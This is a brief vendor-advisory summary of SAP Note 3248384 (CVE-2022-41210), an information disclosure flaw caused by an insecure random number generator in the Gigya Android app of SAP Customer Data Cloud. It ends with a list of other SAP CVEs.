SAP takes the security of its vast product portfolio very seriously and thus releases security fixes for
vulnerabilities reported by external researchers and their customers every second Tuesday of the month.
SAP Note 3248384
was released on
11.10.2022 and deals with
"[CVE-2022-41210] Information Disclosure Vulnerability in SAP Customer Data Cloud (Gigya)" within SAP Customer Data Cloud.
We advice you to follow the instructions, to resolve
insufficient security function
medium potential for exploitation
in component CEC-PRO-GIY.
According to SAP Security Advisory team a workaround does not exist. It is advisable to implement the correction as monthly patch process.
Risk specificationGigya mobile app(android) uses an insecure random number generator program, making it easy for the attacker to predict future random numbers. This can lead to information disclosure and modification of certain user settings.
The affected component has been upgraded and generates properly random numbers.
The advisory is valid for
- 6.7 [CVE-2022-35295] Privilege Escalation Vulnerability in SAPOSCOL on Unix
- 6.5 Information Disclosure vulnerability in SAP Business Client
- 6.3 [CVE-2021-21472] Server password not set during installation of SAP NetWeaver Master Data Management 7.1
- 5.4 [CVE-2020-6178] Insufficient session expiration in SAP Enable Now Manager
- 4.9 [CVE-2022-41209] Information Disclosure Vulnerability in SAP Customer Data Cloud (Gigya)